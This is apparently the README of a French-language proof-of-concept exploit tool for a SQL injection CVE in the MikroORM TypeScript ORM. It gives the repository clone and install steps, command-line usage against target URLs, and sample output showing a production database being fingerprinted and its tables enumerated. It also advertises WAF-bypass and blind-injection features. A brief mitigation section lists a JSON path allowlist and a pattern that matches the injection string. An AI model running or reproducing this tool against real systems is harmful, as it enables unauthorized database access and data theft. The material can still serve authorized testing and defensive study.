
Outil PoC pour CVE-2026-44680 affectant MikroORM ≤7.0.13. Exploite l'injection de chemin JSON pour extraire le contenu de la base de données via des attaques basées sur UNION. Propose la détection de vulnérabilités, l'extraction automatisée de données, l'énumération des tables et la prise en charge de l'injection aveugle. Comprend l'intégration d'un proxy pour Burp Suite et des techniques de contournement de WAF.
Outil professionnel de preuve de concept pour chercheurs en sécurité
CVE-2026-44680 est une vulnérabilité critique d'injection SQL affectant MikroORM, un ORM TypeScript populaire pour Node.js. Ce framework d'exploitation fournit aux chercheurs en sécurité et aux testeurs d'intrusion un outil professionnel pour détecter et exploiter la vulnérabilité.
Auteur : Sudeepa Wanigarathna
Version : 1.0.0
Classification : Outil professionnel de recherche en sécurité
| Attribut | Valeur |
|---|---|
| ID CVE | CVE-2026-44680 |
| Score CVSS | 7.6 (Élevé) |
| Vecteur d'attaque | Réseau |
| Complexité de l'attaque | Faible |
| Privilèges requis | Faible |
@mikro-orm/knex <= 6.6.13@mikro-orm/sql <= 7.0.13MikroORM n'échappe pas correctement les clés de chemins JSON contrôlées à l'exécution lors de la construction de requêtes JSON_EXTRACT. Les attaquants peuvent sortir du contexte du chemin JSON et injecter du code SQL arbitraire.
| Fonctionnalité | Description | Statut |
|---|---|---|
| Détection de vulnérabilité | Détection temporelle et par erreurs | ✅ |
| Extraction de base de données | Version, base de données, utilisateur, nom d'hôte | ✅ |
| Énumération des tables | Découverte automatique de toutes les tables | ✅ |
| Injection basée sur UNION | Extraction de données via UNION SELECT | ✅ |
| Injection aveugle | Extraction de caractères par injection booléenne | ✅ |
| Support du proxy | Burp Suite / proxy d'interception | ✅ |
| Génération de rapports | Rapports TXT professionnels | ✅ |
| Contournement WAF | Techniques avancées d'obfuscation | ✅ |
# Python 3.8 or higher
python3 --version
# pip package manager
pip --version
git clone https://github.com/CerberusMrXi/CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework
cd CVE-2026-44680-exploit
# Using requirements.txt
pip install -r requirements.txt
# Or install manually
pip install requests colorama tqdm urllib3 simplejson
python exploit.py --help
requests>=2.31.0
colorama>=0.4.6
tqdm>=4.65.0
urllib3>=2.0.0
simplejson>=3.19.0
# Full exploitation
python exploit.py -u http://localhost:3000
# Vulnerability detection only
python exploit.py -u http://target.com --detect
# Extract database information
python exploit.py -u http://target.com --extract
# Enumerate tables
python exploit.py -u http://target.com --enumerate
| Option | Description | Défaut |
|---|---|---|
-u, --url | URL cible (obligatoire) | - |
-e, --endpoint | Point de terminaison API | /api/users/search |
-p, --proxy | Proxy HTTP | Aucun |
-v, --verbose | Sortie détaillée | Faux |
--detect | Détecter la vulnérabilité uniquement | Faux |
--extract | Extraire les informations de la base de données | Faux |
--enumerate | Énumérer les tables | Faux |
--blind | Mode d'injection aveugle | Faux |
python exploit.py -u http://192.168.1.100:3000
python exploit.py -u http://target.com -e /api/v2/users/query
python exploit.py -u http://target.com -p http://127.0.0.1:8080
python exploit.py -u http://target.com -v --extract
python exploit.py -u http://target.com --blind
python exploit.py -u http://target.com --detect
python exploit.py -u http://target.com --extract
python exploit.py -u http://target.com --enumerate
============================================================
MikroORM CVE-2026-44680 Exploitation Framework
Author: Sudeepa Wanigarathna
============================================================
[*] Performing vulnerability detection on /api/users/search
[+] Vulnerable to time-based SQL injection
[+] Vulnerability confirmed!
[*] Extracting database information...
[*] Enumerating tables...
[+] Found table: users
[+] Found table: products
[+] Found table: orders
[+] Found table: payments
[+] Found table: admin
===== MIKROORM CVE-2026-44680 EXPLOITATION REPORT =====
Author: Sudeepa Wanigarathna (Security Researcher)
Date: 2026-07-20 14:30:45
Target: http://localhost:3000
[*] VULNERABILITY DETAILS
- CVE: CVE-2026-44680
- CVSS Score: 7.6 (High)
- Affected Components: @mikro-orm/knex <= 6.6.13
[*] DATABASE INFORMATION
- Version: 10.11.6-MariaDB
- Database: production_db
- User: root@localhost
- Hostname: localhost
[*] ENUMERATED TABLES (5 found)
1. users
2. products
3. orders
4. payments
5. admin
[+] Report saved to exploit_report_1742493645.txt
[+] Table list saved to tables_1742493645.txt
exploit_report_1742493645.txt # Complete exploitation report
tables_1742493645.txt # List of discovered tables
npm install @mikro-orm/knex@latest
npm install @mikro-orm/sql@latest
const ALLOWED_JSON_PATHS = ['$.email', '$.name', '$.metadata'];
function validateJsonPath(key) {
if (!ALLOWED_JSON_PATHS.includes(key)) {
throw new Error('Invalid JSON path');
}
return key;
}
# Block suspicious JSON path patterns
"filterField": "\$\.x'\) OR .* -- "
IMPORTANT : Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives.
Ce projet est distribué sous la licence MIT.
MIT License
Copyright (c) 2026 Sudeepa Wanigarathna